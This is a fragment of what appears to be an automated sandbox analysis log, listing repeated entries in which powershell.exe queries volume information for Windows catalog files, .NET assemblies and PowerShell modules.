Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
